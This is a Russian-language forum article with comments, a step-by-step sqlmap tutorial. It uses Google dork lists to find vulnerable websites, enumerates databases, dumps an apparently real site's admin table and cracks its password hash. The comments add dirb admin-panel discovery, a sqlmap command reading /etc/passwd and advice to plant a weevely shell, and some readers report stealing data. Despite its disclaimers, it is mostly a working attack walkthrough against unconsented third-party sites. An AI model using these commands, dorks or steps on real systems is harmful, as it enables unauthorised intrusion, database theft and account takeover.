• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Использование SQLMAP на Kali Linux: взлом веб-сайтов и баз данных через SQL-инъекции

Если вы являетесь пользователем Windows, то обратитесь к статье “Как запустить sqlmap на Windows“. А если вы обнаружили уязвимости в ваших скриптах, то обратитесь к статье “Защита сайта от взлома: предотвращение SQL-инъекций“.

Каждый раз, рассказывая об очередной программе, присутствующей в Kali Linux, я задумываюсь, какие последствия это может вызвать? Эта статья была готова уже давно, но я всё как-то не решался опубликовать её. На самом деле, те, кто взламывают чужие сайты, уже давно и сами знают как пользоваться этой и многими другими программами. Зато среди (начинающих) программистов встречается огромное количество тех, кто вообще будто бы не задумывается о безопасности своих веб-приложений. Я прекрасно понимаю эту ситуацию, когда ты изучаешь PHP, то большим достижением и облегчением является то, что твоя программа вообще работает! Времени всегда не хватает и в этих условиях изучать теорию защиты веб-приложений кажется просто неразумным расточительством.

В этой статье я рассказываю о программе SQLMAP, которая поможет проверить ваши скрипты на уязвимость к SQL-инъекциям.

В общем, я надеюсь, что знания, полученные в этой статье, будут использоваться этично и с пользой для всех.

SQL-инъекция — это техника внедрения кода, используемая для атаки на приложение, управляющее данными, в которой (в технике) вредоносные SQL запросы вставляются в поле ввода для исполнения (например, для получения атакующим содержания дампа базы данных). SQL-инъекция должна эксплуатировать уязвимость в безопасности программ, например, когда пользовательский ввод некорректно фильтруется на наличие различных специфичных символов, включённых в SQL запросы, или когда пользовательский ввод не типизирован строго и выполняется неожиданным образом. SQL-инъекция — это самый широко известный вектор атаки не веб-сайты, но она может быть использована для атаки на любые типы SQL базы данных. В этой инструкции я покажу вам как с помощью программы SQLMAP эксплуатировать SQL-инъекции на Kali Linux и, в конечном итоге, хакнуть веб-сайт (точнее говоря, базу данных) и извлечь имена пользователей и пароли на Kali Linux.

На всякий случай: Если у вас еще нет Kali Linux, то о том где скачать и как установить читайте в статье «Как установить Kali Linux: подробная инструкция для установки на компьютер и в виртуальную машину» – это одна из популярнейших статей на портале. А всевозможные мануалы, инструкции использования ищите на сайте codeby.net по тэгу Kali Linux.

Что такое SQLMAP

sqlmap это инструмент с открытым кодом для тестирования на проникновение, который автоматизирует процесс выявления и эксплуатирования уязвимостей для SQL-инъекций и захвата серверов баз данных. Он поставляется с мощным движком анализа, большим количеством специфичных функций для максимального тестирования на проникновения и широким спектром возможностей простирающихся от выявления типа баз данных по «отпечаткам», охватывает получение информации из базы данных и вплоть до доступа к файловой системе и выполнения команд на ОС через нестандартный доступ к системе.

Особенности
  • Полная поддержка систем управления базами данных MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase и SAP MaxDB.
  • Полная поддержка шести техник SQL-инъекции: слепая на логической основе, основанная на времени слепая, основанная на ошибках, UNION запрос, сложные запросы и нестандартный доступ.
  • Поддержка прямого соединения к базе данных без прохода через SQL-инъекцию путём предоставления полномочий СУБД, IP адреса, порта и имени базы данных.
  • Поддержка перебора пользователей, хешей паролей, привилегий, ролей, баз данных, таблиц и колонок.
  • Автоматическое распознавание формата хеша пароля и поддержка их взлома используя основанную на словаре атаку.
  • Поддержка, по выбору пользователя, создания дампа всех таблиц, определённого их диапазона или специфичных колонок.
  • Пользователь также может выбрать создание дампа только диапазона символов каждого вхождения колонки.
  • Поддержка поиска специфичных имён баз данных, специфичных таблиц по полным базам данных или по отдельным колонкам всех таблиц баз данных. Это полезно, например, для идентификации таблиц, содержащих учётные данные приложения, где соответствующие имена колонок содержат строки вроде name и pass (имя и пароль).
  • Поддержка загрузки и выгрузки любого файл с (на) файловую системы сервера базы данных, когда используются такие программы баз данных как MySQL, PostgreSQL или Microsoft SQL Server.
  • Поддержка выполнения произвольных команд и получение их стандартного вывода на операционной системе, под которой запущен сервер базы данных, когда используются такие программы баз данных как MySQL, PostgreSQL и Microsoft SQL Server.
  • Поддержка установки нестандартного соединения (out-of-band) TCP между атакующей машиной и операционной системой на которой работает база данных. Этим каналом могут быть интеративные командные запросы, сессия Meterpreter или сессия графического пользовательского интерфейса (VNC) — по выбору пользователя.
  • Поддержка процесса повышения прав пользователя через команды Metasploit передаваемые Meterpreter.
Пожалуйста, всегда держите в голове мысль о пользователе, который тратит своё время и усилия на поддержание веб-сайта и, возможно, жизненно зависит от него. Ваши действия могут повлиять на кого-то так, как вы этого никогда не желали. Я не знаю, как ещё доходчивее объяснить это вам.
Собственно, приступим:

Шаг 1: Ищем уязвимый веб-сайт

Это, как правило, самое творческое действие и занимает больше времени, чем другие шаги. Те, кто знает как использовать Google Dorks уже понимают, что нужно делать. Но в том случае, если вы не знаете, то я собрал вместе ряд строк, которые вы можете искать в Гугл. Просто скопируйте-вставьте любую из этих строк в Гугл, и Гугл покажет вам то, что сумел найти.

Шаг 1.а: Строки Google Dorks для поиска уязвимых к SQLMAP SQL веб-сайтов

Этот список действительно большой. У меня заняло много времени для его сбора. Если вы понимаете принцип отбора, тогда вы можете дополнить его. Оставляйте ваши дополнения к списку в комментариях, я добавлю их сюда.

Google Dork string Column 1Google Dork string Column 2Google Dork string Column 3
inurl:item_id=inurl:review.php?id=inurl:hosting_info.php?id=
inurl:newsid=inurl:iniziativa.php?in=inurl:gallery.php?id=
inurl:trainers.php?id=inurl:curriculum.php?id=inurl:rub.php?idr=
inurl:news-full.php?id=inurl:labels.php?id=inurl:view_faq.php?id=
inurl:news_display.php?getid=inurl:story.php?id=inurl:artikelinfo.php?id=
inurl:index2.php?option=inurl:look.php?ID=inurl:detail.php?ID=
inurl:readnews.php?id=inurl:newsone.php?id=inurl:index.php?=
inurl:top10.php?cat=inurl:aboutbook.php?id=inurl:profile_view.php?id=
inurl:newsone.php?id=inurl:material.php?id=inurl:category.php?id=
inurl:event.php?id=inurl:eek:pinions.php?id=inurl:publications.php?id=
inurl:product-item.php?id=inurl:announce.php?id=inurl:fellows.php?id=
inurl:sql.php?id=inurl:rub.php?idr=inurl:downloads_info.php?id=
inurl:index.php?catid=inurl:galeri_info.php?l=inurl:prod_info.php?id=
inurl:news.php?catid=inurl:tekst.php?idt=inurl:shop.php?do=part&id=
inurl:index.php?id=inurl:newscat.php?id=inurl:productinfo.php?id=
inurl:news.php?id=inurl:newsticker_info.php?idn=inurl:collectionitem.php?id=
inurl:index.php?id=inurl:rubrika.php?idr=inurl:band_info.php?id=
inurl:trainers.php?id=inurl:rubp.php?idr=inurl:product.php?id=
inurl:buy.php?category=inurl:eek:ffer.php?idf=inurl:releases.php?id=
inurl:article.php?ID=inurl:art.php?idm=inurl:ray.php?id=
inurl:play_old.php?id=inurl:title.php?id=inurl:produit.php?id=
inurl:declaration_more.php?decl_id=inurl:news_view.php?id=inurl:pop.php?id=
inurl:pageid=inurl:select_biblio.php?id=inurl:shopping.php?id=
inurl:games.php?id=inurl:humor.php?id=inurl:productdetail.php?id=
inurl:page.php?file=inurl:aboutbook.php?id=inurl:post.php?id=
inurl:newsDetail.php?id=inurl:eek:gl_inet.php?ogl_id=inurl:viewshowdetail.php?id=
inurl:gallery.php?id=inurl:fiche_spectacle.php?id=inurl:clubpage.php?id=
inurl:article.php?id=inurl:communique_detail.php?id=inurl:memberInfo.php?id=
inurl:show.php?id=inurl:sem.php3?id=inurl:section.php?id=
inurl:staff_id=inurl:kategorie.php4?id=inurl:theme.php?id=
inurl:newsitem.php?num=inurl:news.php?id=inurl:page.php?id=
inurl:readnews.php?id=inurl:index.php?id=inurl:shredder-categories.php?id=
inurl:top10.php?cat=inurl:faq2.php?id=inurl:tradeCategory.php?id=
inurl:historialeer.php?num=inurl:show_an.php?id=inurl:product_ranges_view.php?ID=
inurl:reagir.php?num=inurl:preview.php?id=inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num=inurl:loadpsb.php?id=inurl:transcript.php?id=
inurl:forum_bds.php?num=inurl:eek:pinions.php?id=inurl:channel_id=
inurl:game.php?id=inurl:spr.php?id=inurl:aboutbook.php?id=
inurl:view_product.php?id=inurl:pages.php?id=inurl:preview.php?id=
inurl:newsone.php?id=inurl:announce.php?id=inurl:loadpsb.php?id=
inurl:sw_comment.php?id=inurl:clanek.php4?id=inurl:pages.php?id=
inurl:news.php?id=inurl:participant.php?id=
inurl:avd_start.php?avd=inurl:download.php?id=
inurl:event.php?id=inurl:main.php?id=
inurl:product-item.php?id=inurl:review.php?id=
inurl:sql.php?id=inurl:chappies.php?id=
inurl:material.php?id=inurl:read.php?id=
inurl:clanek.php4?id=inurl:prod_detail.php?id=
inurl:announce.php?id=inurl:viewphoto.php?id=
inurl:chappies.php?id=inurl:article.php?id=
inurl:read.php?id=inurl:person.php?id=
inurl:viewapp.php?id=inurl:productinfo.php?id=
inurl:viewphoto.php?id=inurl:showimg.php?id=
inurl:rub.php?idr=inurl:view.php?id=
inurl:galeri_info.php?l=inurl:website.php?id=

Шаг 1.б: Начальная проверка для подтверждения, уязвим ли веб-сайт к SQLMAP SQL-инъекции

Для каждой строки, которые приведены выше, вы найдёте сотни поисковых результатов. Как узнать, которые из них действительно уязвимы к SQLMAP SQL-инъекции. Есть множество способов и я уверен, что люди будут спорить, какой из них лучший, но для меня следующий является самым простым и наиболее убедительным.

Допустим вы ищите, используя эту строку inurl:rubrika.php?idr=, и один из веб-сайтов в результатах поиска вроде этого:
Просто добавьте одиночную кавычку ‘ в конец URL. (Просто для уверенности ” – это двойная кавычка, а ‘ – это одиночная кавычка).

Следовательно сейчас адрес будет примерно таким:
Код:
'
Если страница вернёт SQL ошибку, значит страница уязвима для SQLMAP SQL-инъекции. Если она загружается или перенаправляет вас на другую страницу, переходите к следующей странице в результатах поиска Гугл.

Посмотрите на скриншот ниже.

27976


Примеры ошибок SQLi от различных баз данных и языков

Microsoft SQL Server
Код:
Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’
Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.
MySQL ошибки
Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12
Oracle ошибки
Код:
java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated
PostgreSQL Errors
Код:
Query failed: ERROR: unterminated quoted string at or near “‘’’”
Шаг 2: Строим список баз данных СУБД используя SQLMAP SQL-инъекцию

Как вы могли увидеть по вышеприведённому скриншоту, я нашёл уязвимый веб-сайт к SQLMAP SQL-инъекции. Сейчас мне нужно построить список всех баз данных уязвимой СУБД (это ещё называется перечислением баз данных СУБД). Так как я использую SQLMAP, то она также скажет мне, какая переменная является уязвимой.

Запустим следующую команду в отношении вашего уязвимого веб-сайта.
Код:
sqlmap -u  --dbs
Здесь:
  • sqlmap = Имя бинарного файла программы sqlmap
  • -u = Целевой адрес (например. “ )
  • –dbs = Перечислить базы данных СУБД
Скриншот ниже

27975


Эта команда раскрыла совсем немного интересной информации:
Код:
web server operating system: Linux Gentoo
web application technology: Nginx, PHP 5.3.29
back-end DBMS: MySQL 5.0.11
[18:47:01] [INFO] resumed: information_schema
[18:47:01] [INFO] resumed: laminat
Итак, сейчас у нас есть всего лишь одна база данных, в которую стоит заглянуть, information_schema — это стандартная база данных для почти каждой СУБД MYSQL. Следовательно, направим свой интерес на базу данных laminat.

Шаг 3. Построение списка таблиц целевой базы данных, используя SQLMAP SQL-инъекцию

Нам нужно знать как много таблицы имеются в СУБД этого веб-сайта и какие у них имена. Чтобы найти эту информацию выполните следующую команду:
Код:
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat --tables
Славненько, эта база данных имеет 18 таблиц.

Код:
[18:52:25] [INFO] fetching tables for database: 'laminat'
[18:52:25] [INFO] fetching number of tables for database 'laminat'
[18:52:25] [INFO] resumed: 18
[18:52:25] [INFO] resumed: admin
[18:52:25] [INFO] resumed: browser
[18:52:25] [INFO] resumed: diskuse
[18:52:25] [INFO] resumed: diskuse_obor
[18:52:25] [INFO] resumed: diskuse_tema
[18:52:25] [INFO] resumed: historie
[18:52:25] [INFO] resumed: mag_admvolby
[18:52:25] [INFO] resumed: mag_anketa
[18:52:25] [INFO] resumed: mag_autori
[18:52:25] [INFO] resuming partial value: mag_cla
[18:52:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:52:25] [INFO] retrieved: ori
[18:54:23] [INFO] retrieved: mag_claori...
…............
27974


Ну и конечно мы хотим проверить, что находится внутри admin, используя SQLMAP SQL-инъекцию, поскольку, возможно, именно она содержит имя пользователя и пароль.

Шаг 4: Построение списка столбцов целевой таблицы выбранной базы данных используя SQLMAP SQL-инъекцию

Сейчас нам нужно построить список столбцов целевой таблицы admin базы данных нашего веб-сайта, используя SQLMAP SQL-инъекцию. SQLMAP SQL-инъекция делает это действительно простым, запустите следующую команду:
Код:
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin --columns

[19:57:42] [INFO] fetching columns for table 'admin' in database 'laminat'
[19:57:42] [INFO] resumed: 5
[19:57:42] [INFO] resumed: id
[19:57:42] [INFO] resumed: int(2)
[19:57:42] [INFO] resumed: login
[19:57:42] [INFO] resumed: v
[19:57:42] [INFO] resumed: heslo
[19:57:42] [INFO] resumed: varchar(32)
[19:57:42] [INFO] resumed: jmeno
[19:57:42] [INFO] resumed: varchar(20)
[19:57:42] [INFO] resumed: stupen
[19:57:42] [INFO] resumed: int(1)
Database: laminat
Table: admin
[5 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| heslo | varchar(32) |
| id | int(2) |
| jmeno | varchar(20) |
| login | v |
| stupen | int(1) |
+--------+-------------+
27973


АГА! Это точно то, что мы ищем. Если вы не поняли причин моей радости, то небольшой урок лингвистики:
«heslo» — на чешском означает «пароль»
«stupen» — на чешском означает «степень»
А «login» означает на чешском «логин».
Т.е. в этой таблице есть имя пользователя и пароль.

Шаг 5: С помощью SQLMAP SQL-инъекции построим список пользователей из целевого столбца выбранной базы данных

SQLMAP SQL-инъекция делает это простым! Просто снова выполните команду:
Код:
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin --dump
27972


Это командой мы получим полный дамп таблицы. Но если, например, таблица большая, и эксплуатируется слепая инъекция, то, для экономии времени можно модифицировать команду:
Код:
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin -C login --dump
Мы получим список пользователей.

Почти закончили, теперь нам нужны пароли к этим пользователям. Следующим шагом мы их получим.

Шаг 6: С помощью SQLMAP SQL-инъекции извлекаем пароли из целевого столбца таблицы выбранной базы данных

Думаю, вы уже поняли какая команда будет следующей. Что ж, приступим.
Код:
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin -C heslo --dump
ТАДА!! У нас есть пароль.

Но постойте, этот пароль выглядит забавно. Это не может быть чьим-то паролем. Кто-то, кто оставил подобную уязвимость в своём веб-сайте просто не может иметь пароль вроде этого.

Именно так и есть. Это хэш пароля. Это означает, что пароль зашифрован и сейчас нам нужно расшифровать его.

На самом деле, по-большому счёту, программа sqlmap сама всё сделает за нас.

Найдя пароли, она спросит, do you want to store hashes to a temporary file for eventual further processing with other tools, т. е. хотим ли мы сохранить хэши во временный файл, чтобы в дальнейшем обрабатывать их. Это на ваше усмотрение.

Теперь программа говорит do you want to crack them via a dictionary-based attack?, что означает, хотите ли вы использовать атаку, основанную на словаре. Это сэкономит уйму времени, поэтому если вы просто учитесь, пробуете, то соглашаемся.

Нам снова даются три опции:
[1] default dictionary file ‘/usr/share/sqlmap/txt/wordlist.zip’ (press Enter)
(словарь по умолчанию – просто нажмите Enter)
[2] custom dictionary file (файл пользовательского словаря)
[3] file with list of dictionary files (файл со списком пользовательских словарей)
Просто нажмите Enter.

На и, наконец, программа спрашивает do you want to use common password suffixes? (slow!). Это означает, хотим ли мы использовать обычные префиксы. Я отвечаю нет, поскольку это очень долгая процедура. А конкретно этот сайт мне интересен только как пример урока. Узнаю я от него пароль или нет — мне всё равно. Я не готов тратить много времени на эту процедуру.
Код:
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[20:00:41] [INFO] using hash method 'md5_generic_passwd'
[20:00:41] [INFO] resuming password 'nuvolari' for hash '493ccdcab464cff215467d4c62a7f142'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[20:00:45] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[20:00:49] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[20:01:05] [INFO] postprocessing table dump
Database: laminat
Table: admin
[2 entries]
+----+---------------+---------------------------------------------+-------+--------+
| id | jmeno | heslo | login | stupen |
+----+---------------+---------------------------------------------+-------+--------+
| 1 | M?la | 493ccdcab464cff215467d4c62a7f142 (nuvolari) | fucek | 1 |
| 4 | Administr?tor | d41d8cd98f00b204e9800998ecf8427e | admin | 1 |
+----+---------------+---------------------------------------------+-------+--------+
Не смотря на выбор «быстрых» опций, пароль расшифрован!

В этот раз всё получилось быстро и непринуждённо. Иногда бывает ещё проще — пароль не зашифрован. Иногда пароль не удаётся расшифровать быстрым способом. На этот случай у меня есть одна хитрость — я копирую хэш пароля и… ищу в Гугле. Примерно в половине случаев мне везёт — находятся тематические сайты, базы данных, в которых собраны расшифрованные хэши.

Давайте представим ситуацию, когда быстро пароль не подобрался, когда поиск по Гуглу и сайтам с радужными таблицами ( ) не увенчался успехом, и это «не учебная тревога», т. е. вас интересует конкретный сайт и для вас важно знать для него пароль, то можно попытаться воспользоваться специальным программным обеспечением.

К расшифровке паролей я ещё вернусть, это будет большая статья, охватывающая взлом MD5, phpBB, MySQL и SHA1 паролей с помощью Hashcat на Kali. Не пропустите её.

Заключение

Спасибо за чтение и посещение этого веб-сайта.

Есть много других способов проникнуть в базу данных или получить пользовательскую информацию. Вам следует использовать эти техники только на веб-сайтах, которые дали вам на этой разрешение.

Пожалуйста, поделитесь этой статьёй, это даст возможность каждому изучить как с использованием этой техники тестировать их веб-сайты.

п.с. пока писал статью, какой-то чудак «хакнул» это несчастный сайт — ничего не удалил, просто дефейснул его. Друзья, давайте учиться, пробовать, думать, изучать программы, искать обходные пути, нестандартные решения, постигать глубины сетевых технологий, заглядывать туда, куда другие не могут, но давайте не будем заниматься мелкими пакостями!
 

Сергей Попов

Кодебай
30.12.2015
4 691
6 584
BIT
291
Alexey
Суббота на 10:02 ДП
Шикарный "отклик" на статью: количество сканирований на SQL-инъекции адреса Использование SQLMAP на Kali Linux: взлом веб-сайтов и баз данных через SQL-инъекции превышает количество просмотров.

Кто-то на фриланс.ру заказал взлом что ли?

KpoT
Суббота на 07:06 ПП
Вы другого ожидали.
Есть в паблике не плохой видео курс человека по имени Hitesh Choudhary переведенный на русский язык, ссылку оставлять не буду так как его найти и скачать не составит труда, название курса "Все секреты SQL". ALEXEY если есть желание можете изучить данный курс и написать в своем блоге несколько не плохих статей про SQL инъекции…
P.S. Думаю после этого на Ваш замечательный блог точно обрушиться шквал кулхацкеров

WebWare Team
Суббота на 07:06 ПП
Это мой старый , с тех пор я уже разобрался в чём дело. В этой статье же все дорки собраны, по которым обычно ищут. Дело не в том, что кто-то лично не любит меня или сайт – это просто бездушные программы просеивают сайты в поисках уязвимых.

Спасибо за наводку на курс – посмотрю

По SQL-инъекциям есть хорошая литература, даже на русском. Например, «SQL Injection от А до Я» Дмитрий Евтеев – потрясающая книга, где всё коротко и чётко.

А для тех, кто любит поподробнее, можно рекомендовать Justin Clarke. SQL Injection Attacks and Defense. Там 470 страниц и все про это.

aleks
Четверг на 08:12 ПП
sql dumper эту страницу всегда парсит,как "подозрение на уязвимость" из-за примера ошибок бд в самой статье. отсюда и количество сканов)) я сам сюда так попал

ajeuik
Пятница на 04:08 ПП
получается все сайты, имеющие в адресной строки описанные строки google dorks уязвимы?

WebWare Team
Пятница на 04:08 ПП
Конечно нет. Из нескольких десятков просмотренных сайтов один выдаёт ошибку на кавычку. Из тех, кто выдаёт ошибку, только где-то половина-четверть имеют эксплуатируемую уязвимость.

Эти дорки – чтобы было от чего отталкиваться при поиске.

Для учёбы можно найти 1-2 сайта и ручками, хотя как повезёт – бывает сразу найдёшь, бывает целый час что-то стоящее ищешь.

Но надо сказать, что уязвимых сайтов много! Если их ручками «шерстить», то при сноровке можно каждый час по нескольку набирать.

А у тех, кто этим всерьёз занимается, есть соответствующий софт, который автоматически проверяет множество сайтов в автоматическом режиме. Т.е. если у вас сайт с плохо написанным кодом, даже если он не популярный и на него никто не заходит, есть высокая вероятность, что хакеры уже внутри – залили шелл и уже используют для противоправных действий или оставили его про запас.

Цель этой статьи (и всего сайта) не научить взламывать, а показать программистам и веб-мастерам, какова истинная опасность уязвимостей и насколько некоторые из них легко эксплуатируются. Привлечь их внимание к вопросам безопасности, к изучению «безопасного» программирования.

johndoe
Пятница на 05:10 ПП
Замечательная статья, спасибо, буду побывать тестировать сегодня о трудах проделланых отпишусь

TomRapocik
Суббота на 05:11 ПП
Здравствуйте как создать топик? Благодарю!

WebWare Team
Вторник на 02:01 ДП
Для этой цели создан форум.

kek
Понедельник на 02:11 ПП

Спасибо
Среда на 02:03 ДП
Спасибо познавательно. Ради пробы стащил пару табличек.Работает.

Toretto
Пятница на 02:04 ПП
привет подскажите, нубский вопрос вот я получил логин и пароль,. внимание!!!- как войти в админку?

Alex
Четверг на 02:04 ПП
как взломать хэш, если в таблице sqlmap кроме самого зашифрованного пароля присутствует salt?
Код:
salt 80a password 088529c10de60bf6ac8c056331c6aa81d7be1fd7d312bbf72b33724f1eef6ad9

do you want to crack them via a dictionary-based attack? [Y/n/q] y
[15:56:59] [INFO] using hash method ‘sha512_generic_passwd’
[15:56:59] [WARNING] no clear password(s) found
Alex
Пятница на 08:04 ДП
******* занятный адресок))
Пункт 3.

alex
Среда на 03:04 ПП
это не реклама. а занятно полазить по базам. их 35 вроде

Канат
Пятница на 10:09 ПП
Автор мы можете мне обьяснить зачем это нужно ну типа индекс.пнп, рубрика.пнп?

Андрей
Четверг на 11:03 ДП
А куда вводить полученый пароль? Самому логикой искать вход( ….php?id=1047/_admin/), или как
 
А

анонимейзер

полезный совет все работает спасибо автору вот как только найти админку для входа?
 

s unity

Green Team
18.09.2019
207
25
BIT
0
полезный совет все работает спасибо автору вот как только найти админку для входа?
root@kali:~# dirb
и по своему дефолтному словарю ищет интересные уголки. можно найти не только админку
(называется dirbuster, имеется в стандртном арсенале вооружения кали линух)
Одновременно можно запустить поиск админок на
Одновременно можно пробовать в ручную вбивать в строку браузера /controlpanel/, /cpanel/, example.com:2083 и тому подобное, в 90% случаев найдешь быстро такими методами
 
  • Нравится
Реакции: Easypay

R3M1X

Green Team
16.02.2020
117
20
BIT
0
малость дополню по sqlmap, можно проще всё сделать:
Код:
sqlmap -u 'site.com' --batch --random-agent --current-user --is-dba -o -b
дальше:
Код:
sqlmap -u 'site.com' --file-read="/etc/passwd" --file-read="httpd/pass/httpd/passwd.conf"
А потом можно и залить шелл используя weevely всё зависит от вашей фантазии ...
 

Soska001

New member
31.03.2020
1
0
BIT
0
Google Dork string Column 1Google Dork string Column 2Google Dork string Column 3
inurl:item_id=inurl:review.php?id=inurl:hosting_info.php?id=
inurl:newsid=inurl:iniziativa.php?in=inurl:gallery.php?id=
inurl:trainers.php?id=inurl:curriculum.php?id=inurl:rub.php?idr=
inurl:news-full.php?id=inurl:labels.php?id=inurl:view_faq.php?id=
inurl:news_display.php?getid=inurl:story.php?id=inurl:artikelinfo.php?id=
inurl:index2.php?option=inurl:look.php?ID=inurl:detail.php?ID=
inurl:readnews.php?id=inurl:newsone.php?id=inurl:index.php?=
inurl:top10.php?cat=inurl:aboutbook.php?id=inurl:profile_view.php?id=
inurl:newsone.php?id=inurl:material.php?id=inurl:category.php?id=
inurl:event.php?id=inurl:eek:pinions.php?id=inurl:publications.php?id=
inurl:product-item.php?id=inurl:announce.php?id=inurl:fellows.php?id=
inurl:sql.php?id=inurl:rub.php?idr=inurl:downloads_info.php?id=
inurl:index.php?catid=inurl:galeri_info.php?l=inurl:prod_info.php?id=
inurl:news.php?catid=inurl:tekst.php?idt=inurl:shop.php?do=part&id=
inurl:index.php?id=inurl:newscat.php?id=inurl:productinfo.php?id=
inurl:news.php?id=inurl:newsticker_info.php?idn=inurl:collectionitem.php?id=
inurl:index.php?id=inurl:rubrika.php?idr=inurl:band_info.php?id=
inurl:trainers.php?id=inurl:rubp.php?idr=inurl:product.php?id=
inurl:buy.php?category=inurl:eek:ffer.php?idf=inurl:releases.php?id=
inurl:article.php?ID=inurl:art.php?idm=inurl:ray.php?id=
inurl:play_old.php?id=inurl:title.php?id=inurl:produit.php?id=
inurl:declaration_more.php?decl_id=inurl:news_view.php?id=inurl:pop.php?id=
inurl:pageid=inurl:select_biblio.php?id=inurl:shopping.php?id=
inurl:games.php?id=inurl:humor.php?id=inurl:productdetail.php?id=
inurl:page.php?file=inurl:aboutbook.php?id=inurl:post.php?id=
inurl:newsDetail.php?id=inurl:eek:gl_inet.php?ogl_id=inurl:viewshowdetail.php?id=
inurl:gallery.php?id=inurl:fiche_spectacle.php?id=inurl:clubpage.php?id=
inurl:article.php?id=inurl:communique_detail.php?id=inurl:memberInfo.php?id=
inurl:show.php?id=inurl:sem.php3?id=inurl:section.php?id=
inurl:staff_id=inurl:kategorie.php4?id=inurl:theme.php?id=
inurl:newsitem.php?num=inurl:news.php?id=inurl:page.php?id=
inurl:readnews.php?id=inurl:index.php?id=inurl:shredder-categories.php?id=
inurl:top10.php?cat=inurl:faq2.php?id=inurl:tradeCategory.php?id=
inurl:historialeer.php?num=inurl:show_an.php?id=inurl:product_ranges_view.php?ID=
inurl:reagir.php?num=inurl:preview.php?id=inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num=inurl:loadpsb.php?id=inurl:transcript.php?id=
inurl:forum_bds.php?num=inurl:eek:pinions.php?id=inurl:channel_id=
inurl:game.php?id=inurl:spr.php?id=inurl:aboutbook.php?id=
inurl:view_product.php?id=inurl:pages.php?id=inurl:preview.php?id=
inurl:newsone.php?id=inurl:announce.php?id=inurl:loadpsb.php?id=
inurl:sw_comment.php?id=inurl:clanek.php4?id=inurl:pages.php?id=
inurl:news.php?id=inurl:participant.php?id=
inurl:avd_start.php?avd=inurl:download.php?id=
inurl:event.php?id=inurl:main.php?id=
inurl:product-item.php?id=inurl:review.php?id=
inurl:sql.php?id=inurl:chappies.php?id=
inurl:material.php?id=inurl:read.php?id=
inurl:clanek.php4?id=inurl:prod_detail.php?id=
inurl:announce.php?id=inurl:viewphoto.php?id=
inurl:chappies.php?id=inurl:article.php?id=
inurl:read.php?id=inurl:person.php?id=
inurl:viewapp.php?id=inurl:productinfo.php?id=
inurl:viewphoto.php?id=inurl:showimg.php?id=
inurl:rub.php?idr=inurl:view.php?id=
inurl:galeri_info.php?l=inurl:website.php?id=
КАК НАЙТИ ТКАИХ ТИПА
inurl:rub.php?idr=
?

КАК НАЙТИ ТАКАЙКХ ТИПА
inurl:rub.php?idr=
КАК УЗНАТ КАКОЙ У САЙТА ТАКОЙ inurl:rub.php?idr=
Я НЕ МАГУ НАЙТИ ЭТОГО САЙТА
ttps://portal.kundelik.kz
 

R3M1X

Green Team
16.02.2020
117
20
BIT
0
Забудьте про дорки, они все давно уже стухли, эпоха дорок закончена ещё в 2016 году когда они были на тот момент актуальны.
 
Последнее редактирование модератором:

Kos2d

New member
19.07.2021
4
0
BIT
0
Всех приветствую! Апну старую тему.
А что делать, если Кали не предложила автоматически расшифровать хеши?
Как их можно дешифровать?
 

Rook

Codeby Team
Red Team
09.01.2019
727
711
BIT
4
Всех приветствую! Апну старую тему.
А что делать, если Кали не предложила автоматически расшифровать хеши?
Как их можно дешифровать?
узнать тип хеша и сбрутить его через hashcat

узнать тип хеша можно с помощью команды hashid ваш_хэш
а по hashcat смотрите документацию
 

Kos2d

New member
19.07.2021
4
0
BIT
0
узнать тип хеша и сбрутить его через hashcat

узнать тип хеша можно с помощью команды hashid ваш_хэш
а по hashcat смотрите документацию
Спасибо! Какая то странная происходит ситуация.
У всех пользователей хеш определяется. У админа хеш не определяется.
У пользователей разбирается хеш, получается пароли 3х - 4х значные. И они естественно не верные.
Странности какие то.
 

Rook

Codeby Team
Red Team
09.01.2019
727
711
BIT
4
Спасибо! Какая то странная происходит ситуация.
У всех пользователей хеш определяется. У админа хеш не определяется.
У пользователей разбирается хеш, получается пароли 3х - 4х значные. И они естественно не верные.
Странности какие то.
Вы определили тип хеша? Возможно они с солью
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!